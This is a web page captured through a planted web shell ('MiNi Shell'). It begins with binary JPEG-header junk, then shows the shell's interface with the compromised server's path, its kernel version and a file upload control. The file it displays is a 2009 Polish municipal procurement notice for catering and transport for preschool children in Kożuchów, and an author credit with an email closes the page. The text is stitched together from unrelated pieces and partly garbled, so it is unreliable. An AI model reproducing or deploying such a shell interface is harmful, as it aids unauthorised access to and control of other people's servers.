JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090821/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090821/289230-N-2009.html

<p class="kh_header"><b>Kożuchów: Świadczenie usług cateringowych i dowozów dzieci w ramach realizacji projektu pn.: Kożuchów Dzieciom współfinansowanego ze środków Unii Europejskiej.</b><br>
<b>Numer ogłoszenia: 289230 - 2009; data zamieszczenia: 21.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski , ul. Rynek 1a, 67-120 Kożuchów, woj. lubuskie, tel. 068 3552094 do 97, faks (068) 355 28 68.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kozuchow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.bip.kozuchow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług cateringowych i dowozów dzieci w ramach realizacji projektu pn.: Kożuchów Dzieciom współfinansowanego ze środków Unii Europejskiej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Cel zamówienia
Celem zamówienia jest świadczenie regularnych usług cateringowych i dowozów dzieci w ramach realizacji projektu pn.: Kożuchów Dzieciom współfinansowanego ze środków Unii Europejskiej w ramach Funduszu Społecznego Priorytet IX Działanie 9.1 Poddziałanie 9.1.1 tzn. przygotowanie i dostarczenie gorących posiłków jednodniowych dla uczestników zajęć oraz dowozy i odwozy uczestników na zajęcia.
2. Przedmiot zamówienia podzielony jest na dwa zadania:
Zadanie 1 - Usługi cateringu wraz z dostawą do placówek na terenie gminy Kożuchów.
Zadanie 2 - Usługi dowozów dzieci do placówek na terenie gminy Kożuchów..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 55.52.40.00-9, 60.14.00.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1 W postępowaniu o udzielenie zamówienia publicznego mogą wziąć udział Oferenci, którzy: 
1.1  posiadają  uprawnienia  do  wykonywania  działalności  lub  czynności  odpowiadającym przedmiotowi zamówienia; 
1.2  posiadają  niezbędną wiedzę  i  doświadczenie  do wykonania  zamówienia  oraz  dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia; 
1.3  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 
1.4 nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego w oparciu o art. 24 ust. 1 i ust. 2 ustawy Prawo zamówień publicznych.
Zamawiający  dokonuje  oceny  spełniania  przez wykonawców warunków  udziału w  postępowaniu według zasady spełnia - nie spełnia, przy czym niespełnienia którekolwiek z warunków skutkuje wykluczeniem wykonawcy z postępowania lub odrzuceniem oferty..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 6.1 Wykonawcy, którzy składają ofertę na wykonanie zamówienia w zakresie Zadania 1
6.1.1 Wypełnioną ofertę A - załącznik nr 1A do SIWZ
6.1.2 Wypełniony formularz ofertowy - załącznik nr 1a do Oferty A
6.1.3 Oświadczenie o spełnieniu warunków art. 22 ust.1 pkt.1-4 oraz, że Wykonawca nie podlega wykluczeniu z ubiegania się o udzielenie zamówienia publicznego zgodnie z art. 24 Ustawy Prawo zamówień publicznych zwanej dalej Ustawą - załącznik nr 2a do Oferty A *
6.1.4 Pełnomocnictwo do reprezentowania w postępowaniu i podpisania umowy (w przypadku wspólnego  ubiegania się Wykonawców o zamówienie, np. konsorcja i spółki cywilne) oraz jeżeli Formularz  oferty  i  stosowne  załączniki  są  podpisane  przez  osobę  (y) upoważnioną  (e)  do  reprezentowania Wykonawcy  nie wynikającą  z  właściwego  rejestru  albo zaświadczenia o wpisie do ewidencji działalności gospodarczej.
6.1.5 Proponowany jadłospis dekadowy uwzględniający normy żywieniowe przewidziane dla dzieci w wieku od 3 do 5 lat.
6.1.6 Oświadczenie, że posiłki dostarczane będą  przygotowane  przez  Wykonawcę  w  obiektach  lub  obiekcie,  dla  którego Wykonawca  posiada  decyzję  inspektora  sanitarnego  o  dopuszczeniu  obiektu  do przygotowywania posiłków dla potrzeb zbiorowego żywienia. Posiłki będą odpowiadały normom żywieniowym, a osoby wykonujące zamówienie pracują zgodnie z obowiązującymi przepisami sanitarnymi.(Załącznik nr 5a do Oferty A)
6.1.7 Oświadczenie  o  dysponowaniu  przez  Wykonawcę  środkiem  transportu  do  przewozu posiłków, dla którego Wykonawca posiada decyzję inspektora sanitarnego o dopuszczeniu  środka  transportu  do  przewozu  posiłków  dla  potrzeb  zbiorowego  żywienia dzieci lub   pisemne  zobowiązanie  innych  podmiotów  do  udostępnienia  ww środka transportu. (Załącznik nr 4a do Oferty A)
6.1.8 Bieżącą  opinię  sanitarna  Państwowego  Powiatowego  Inspektora  Sanitarnego, potwierdzającą, że Wykonawca  spełnia określone wymogi w zakresie  świadczonych usług będących przedmiotem zamówienia.
6.1.9 Aktualny  odpis  z  właściwego  rejestru  albo  aktualne  zaświadczenie  o  wpisie  do ewidencji  działalności  gospodarczej,  jeżeli  odrębne  przepisy  wymagają  wpisu  do rejestru  lub  zgłoszenia  do ewidencji  działalności  gospodarczej,  wystawione  nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert *;
6.1.10 Aktualne zaświadczenie właściwego Naczelnika Skarbowego oraz właściwego oddziału Zakładu  Ubezpieczeń  Społecznych  potwierdzających  odpowiednio,  że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek   na ubezpieczenie zdrowotne  i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub  rozłożenie  na  raty  zaległych  płatności  lub  wstrzymanie  w  całości  wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert *;
6.1.11 Wykaz wykonanych w okresie ostatnich 3  lat usług o podobnym  rodzaju  i charakterze do przedmiotu  zamówienia,  a  jeżeli  okres  prowadzenia  działalności  jest  krótszy  -  w  tym okresie, z podaniem ich wartości, daty i miejsca wykonania oraz załączeniem dokumentów pochodzących  od  odbiorcy  tych  usług,  potwierdzających  że  usługi  te  zostały  wykonane należycie.  Zamawiający wymaga  by wykonawca wykazał,  że  wykonywał  już  co  najmniej  1  usługę  odpowiadającą  swoim  rodzajem  i charakterem usłudze będącej przedmiotem zamówienia. (Załącznik nr 3a do Oferty A);
6.1.12 Zaparafowany  przez  wykonawcę  wzór  umowy  jako  znak  akceptacji warunków, na których zamawiający zleci wykonanie zamówienia publicznego. (Załącznik nr 2A do SIWZ);
*  dokumenty  z  tym  znakiem  winny  być  przedstawione  przez  każdego  wykonawcę,  w  przypadku  Wykonawców występujących wspólnie, na podstawie art. 23 ustawy Pzp. 
Pozostałe wymienione dokumenty w  przypadku  składania  oferty  przez  Wykonawców  występujących  wspólnie wystarczy gdy ww. dokumenty złoży jeden z podmiotów występujących wspólnie.
6.2 Wykonawcy, którzy składają ofertę na wykonanie zamówienia w zakresie Zadania 2
6.2.1 Wypełnioną ofertę B - załącznik nr 1B do SIWZ
6.2.2 Wypełniony formularz ofertowy - załącznik nr 1b do Oferty B
6.2.3 Oświadczenie o spełnieniu warunków art. 22 ust.1 pkt.1-4 oraz, że Wykonawca nie podlega wykluczeniu z ubiegania się o udzielenie zamówienia publicznego zgodnie z art. 24 Ustawy Prawo zamówień publicznych zwanej dalej Ustawą - załącznik nr 2b do Oferty B *
6.2.4 Pełnomocnictwo do reprezentowania w postępowaniu i podpisania umowy (w przypadku wspólnego  ubiegania się Wykonawców o zamówienie, np. konsorcja i spółki cywilne) oraz jeżeli Formularz  oferty  i  stosowne  załączniki  są  podpisane  przez  osobę  (y) upoważnioną  (e)  do  reprezentowania Wykonawcy  nie wynikającą  z  właściwego  rejestru  albo zaświadczenia o wpisie do ewidencji działalności gospodarczej.
6.2.5 Wykaz kierowców przewidzianych do realizacji zamówienia (Załącznik nr 3b do Oferty B);
6.2.6 Wykaz pojazdów przewidzianych do realizacji zamówienia (Załącznik 4b do Oferty B);
6.2.7 Aktualny  odpis  z  właściwego  rejestru  albo  aktualne  zaświadczenie  o  wpisie  do ewidencji  działalności  gospodarczej,  jeżeli  odrębne  przepisy  wymagają  wpisu  do rejestru  lub  zgłoszenia  do ewidencji  działalności  gospodarczej,  wystawione  nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert *;
6.2.8 Aktualne zaświadczenie właściwego Naczelnika Skarbowego oraz właściwego oddziału Zakładu  Ubezpieczeń  Społecznych  potwierdzających  odpowiednio,  że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek   na ubezpieczenie zdrowotne  i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub  rozłożenie  na  raty  zaległych  płatności  lub  wstrzymanie  w  całości  wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert *;
6.2.9 Zaparafowany  przez  wykonawcę  wzór  umowy  jako  znak  akceptacji warunków, na których zamawiający zleci wykonanie zamówienia publicznego. (Załącznik nr 2B do SIWZ);
*  dokumenty  z  tym  znakiem  winny  być  przedstawione  przez  każdego  wykonawcę,  w  przypadku  Wykonawców występujących wspólnie, na podstawie art. 23 ustawy Pzp. 
Pozostałe wymienione dokumenty w  przypadku  składania  oferty  przez  Wykonawców  występujących  wspólnie wystarczy gdy ww. dokumenty złoży jeden z podmiotów występujących wspólnie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.kozuchow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Publiczne Przedszkole Nr 3 w Kożuchowie, ul. Górska 17, 67-120 Kożuchów.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.08.2009 godzina 09:00, miejsce: Publiczne Przedszkole Nr 3 w Kożuchowie, ul. Górska 17, 67-120 Kożuchów.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie będzie udzielone w ramach realizacji Projektu Kożuchów - Dzieciom Priorytet IX Rozwój wykształcenia i kompetencji w regionach
Działanie 9.1 Wyrównanie szans edukacyjnych  i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie  9.1.1 Zmniejszenie nierówności w stopniu upowszechnienia edukacji przedszkolnej..</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usługi cateringu wraz z dostawą do placówek na terenie gminy Kożuchów..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie opisano za pomocą harmonogramu przedstawionego w pkt. 3.4 SIWZ Ilość dostarczanych posiłków dla dzieci w czasie realizacji zamówienia - 23.850.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.52.40.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługi dowozów dzieci do placówek na terenie gminy Kożuchów.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie opisano za pomocą harmonogramu przedstawionego w pkt. 3.5 SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.14.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com